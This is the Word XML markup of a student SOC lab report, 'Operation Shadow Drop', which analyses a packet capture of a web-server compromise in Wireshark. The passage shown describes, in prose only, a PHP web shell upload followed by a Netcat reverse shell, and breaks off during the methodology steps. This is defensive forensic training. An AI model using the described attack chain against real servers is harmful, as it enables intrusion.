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4E72B93" wp14:paraId="6958708A" wp14:textId="1D5C3EF7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322" w:afterAutospacing="off"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="34E72B93" wp14:paraId="01C58E8D" wp14:textId="45B51F51">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322" w:afterAutospacing="off"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="34E72B93" wp14:paraId="22118F81" wp14:textId="7235E84F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322" w:afterAutospacing="off"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="34E72B93" wp14:paraId="78DAEC85" wp14:textId="78E5657E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322" w:afterAutospacing="off"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="34E72B93" w:rsidR="00DED4D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>International Certified Digital Forensics Academy (ICDFA)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="34E72B93" wp14:paraId="31FCC396" wp14:textId="3E34ECF5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
        <w:jc w:val="center"/>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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="34E72B93" w:rsidR="00DED4D6">
        <w:rP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US"/>
        </w:rPr>
        <w:t>Phase 2 – Ethical Hacking Specialization</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="34E72B93" wp14:paraId="4FF1EBC0" wp14:textId="2355C7DC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
        <w:jc w:val="center"/>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34E72B93" w:rsidR="00DED4D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INT401 – Network Security Operations</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="34E72B93" wp14:paraId="6842AF21" wp14:textId="79035279">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Heading1Cha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4E72B93" w:rsidR="6E5F3136">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOC Incident Simulation: Operation Shadow Drop</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="34E72B93" wp14:paraId="136DAEC0" wp14:textId="0FD8E6CC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="360" w:after="80"/>
        <w:jc w:val="center"/>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34E72B93" w:rsidR="00DED4D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 xml:space="preserve">SELLINE NAFULA MANG’ENI   </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="34E72B93" wp14:paraId="0A486ADD" wp14:textId="458CCFC2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="360" w:after="80"/>
        <w:jc w:val="center"/>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34E72B93" w:rsidR="00DED4D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2025/INT/11755</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="34E72B93" wp14:paraId="2C078E63" wp14:textId="207416B8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="34E72B93" w:rsidR="43AA775C">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1</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="00DED4D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w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="74E5A581">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8</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="00DED4D6">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t>/2026</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="585AE97E" w14:textId="6AE203DE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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pPr>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="7E9650AE" w14:textId="05DDDCD4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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pPr>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="1498F2B1" w14:textId="7F0AF545">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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pPr>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="4E3B2B8A" w14:textId="08EE96B7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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pPr>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="6D365107" w14:textId="41EE4945">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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pPr>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="6861D6F3" w14:textId="216CB781">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="27703149" w14:textId="6B1DA61A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="0D4CA54B" w14:textId="1295A300">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="4E4BE7EB" w14:textId="5DC6E84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This report presents the findings of a Security Operations Center (SOC) investigation conducted on the network packet capture (PCAP) file provided for the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Operation Shadow Drop</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incident simulation. The purpose of the investigation was to determine how an attacker successfully uploaded a malicious web shell to a production web server, identify the techniques used during the attack, and establish whether the attacker attempted to exfiltrate sensitive information from the compromised server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="2E35CCC3" w14:textId="4AF4331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investigation was performed using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Wireshark</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running on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Kali Linux</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which allowed detailed inspection of captured network traffic. Various packet analysis techniques including HTTP request filtering, TCP stream reconstruction, packet inspection, protocol hierarchy analysis, conversation analysis, and IP geolocation were used throughout the investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="792E0613" w14:textId="113C055F">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captured traffic revealed a complete attack chain beginning with normal HTTP requests, followed by the upload of a malicious PHP web shell through an HTTP POST request. The uploaded web shell established an outbound reverse shell connection to the attacker's system using Netcat, giving the attacker remote command execution capabilities. Further analysis showed that the attacker attempted to access uploaded content and prepare for additional malicious activities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="6702958A" w14:textId="068D675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Each mission in this report explains the investigative process, presents the evidence collected, and documents the conclusions reached based on packet-level forensic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="185FD39E" w14:textId="77288109">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="4467DEE2" w14:textId="46338FF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investigation aimed to accomplish the following objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="028848CB" w14:textId="665F5BFF">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Determine the geographical location from which the attack originated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="359CB35B" w14:textId="122483E4">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Identify the User-Agent string used during the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="2C885AF0" w14:textId="5EE9B78E">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Determine the malicious web shell uploaded to the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="6E737EC3" w14:textId="289ABC2D">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Identify the server directory used for storing uploaded files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="19468889" w14:textId="7DBBDB1E">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Determine the outbound communication port used by the uploaded web shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="6C26054A" w14:textId="7A40964B">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Identify the file that the attacker attempted to exfiltrate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="6819D49B" w14:textId="6DC8E75F">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Construct a complete attack timeline.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="4927D613" w14:textId="19C528F6">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Produce a professional SOC incident report with supporting forensic evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="2E8F940D" w14:textId="48EB2CA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Recommend security measures that would prevent similar attacks in future environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="0D6B1947" w14:textId="522CE524">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="19BE0D8E" w14:textId="757728B3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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Investigation Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="5352FF60" w14:textId="36D7F7B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investigation followed a structured digital forensic process commonly used within Security Operations Centers (SOC). Every finding documented in this report was obtained from analysis of the supplied PCAP file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="1B88DF0F" w14:textId="13F2B0EF">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investigation process consisted of the following stages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="40981AD8" w14:textId="5875250E">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Step 1: Loading the Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="697966E0" w14:textId="37D4207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supplied PCAP file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c116-WebStrike.pcap</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was opened in Wireshark running on Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="58EB3ED8" w14:textId="514B67CB">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packet capture contained all network communications exchanged between the attacker and the production web server during the incident.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E726B36" w:rsidP="34E72B93" w:rsidRDefault="6E726B36" w14:paraId="3803F43D" w14:textId="4D5B823E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidR="6E726B36">
        <w:drawing>
          <wp:inline wp14:editId="245358CC" wp14:anchorId="1C8FB189">
            <wp:extent cx="5943600" cy="3409950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="508068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068090" name="Picture 508068090"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId291946250">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r w:rsidRPr="34E72B93" w:rsidR="21E32C6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="19BBB798" w14:textId="2FAE8830">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Step 2: Identifying Active Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="7D47456A" w14:textId="0102F4EB">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Statistics → Endpoints</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window was examined to identify all communicating IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="436FD8AE" w14:textId="072D141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This revealed two active IPv4 addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="2DF8D7C6" w14:textId="1816F2F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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117.11.88.124</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="05EDF6B2" w14:textId="2F991580">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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24.49.63.79</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="2D7C7BBC" w14:textId="71B9698B">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packet counts indicated continuous communication between these two systems, suggesting one represented the attacker while the other represented the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A6C38CF" w:rsidP="34E72B93" w:rsidRDefault="1A6C38CF" w14:paraId="693AC6F1" w14:textId="12336FBD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="1A6C38CF">
        <w:drawing>
          <wp:inline wp14:editId="57C5BFB9" wp14:anchorId="5997F75D">
            <wp:extent cx="5943600" cy="2609850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="469257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257287" name="Picture 469257287"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId461089763">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3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="372124E7" w14:textId="749B63BE">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 xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="4057A3AF">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2</w:t>
      </w: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IPv4 Endpoints showing communication between the attacker and the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="62D903D2" w14:textId="5E2D5211">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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Step 3: Examining Conversations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="0F25CABB" w14:textId="53FA096A">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Statistics → Conversations</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feature was used to understand how traffic flowed between both hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="48C87119" w14:textId="2001C77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This showed a continuous TCP conversation carrying HTTP requests and responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="2A407578" w14:textId="6C878A4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conversation statistics confirmed that the majority of packets originated from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117.11.88.124</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indicating that this host initiated the communication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E18341D" w:rsidP="34E72B93" w:rsidRDefault="5E18341D" w14:paraId="0716687C" w14:textId="0DEFA60A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="5E18341D">
        <w:drawing>
          <wp:inline wp14:editId="7A6835F0" wp14:anchorId="012EF4F1">
            <wp:extent cx="5943600" cy="2571750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="644671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671325" name="Picture 644671325"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1343573504">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3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="743ED032" w14:textId="5384F0F0">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 xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="76081565">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3</w:t>
      </w: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TCP Conversation statistics showing communication between attacker and server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="4478B6B9" w14:textId="40F5BD25">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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Step 4: HTTP Traffic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="1ABF79BE" w14:textId="5715B984">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HTTP traffic was isolated using the display filter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="14CD2E98" w14:textId="5F232493">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http.request</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="12B54E21" w14:textId="1E552CB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This allowed inspection of every web request made to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="3690E495" w14:textId="4964F12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Individual packets were opened to inspect:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="15C029F9" w14:textId="400E2239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Request URI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="144FBD03" w14:textId="033C5CC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Request Method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="1E0C4387" w14:textId="77C618FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="5AFE8693" w14:textId="0F572118">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="1E4F3E78" w14:textId="635669FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Uploaded files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="7380338A" w14:textId="6E126B59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Requested resources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="6489A60E" w14:textId="52A663D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This stage identified the upload request responsible for compromising the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="56813319" w14:textId="286B94D9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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Step 5: Packet Inspection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="21CA0D85" w14:textId="3FABB4B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Each HTTP packet was expanded to inspect its protocol fields.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="47BCD768" w14:textId="7F72B73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Important fields examined included:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="5A15D1C7" w14:textId="24ACD3F4">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Request Method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="13C4037E" w14:textId="79411EAF">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Request URI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="17DF792F" w14:textId="6EB058B7">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Content-Type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="791A5E55" w14:textId="17F8F5E0">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MIME Multipart Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="0E506244" w14:textId="01D8F26D">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Uploaded filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="046017E2" w14:textId="10E636CC">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User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="56806D89" w14:textId="77F7948B">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Host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82F8ED" w:rsidP="34E72B93" w:rsidRDefault="3B82F8ED" w14:paraId="6FEDA856" w14:textId="4E910366">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
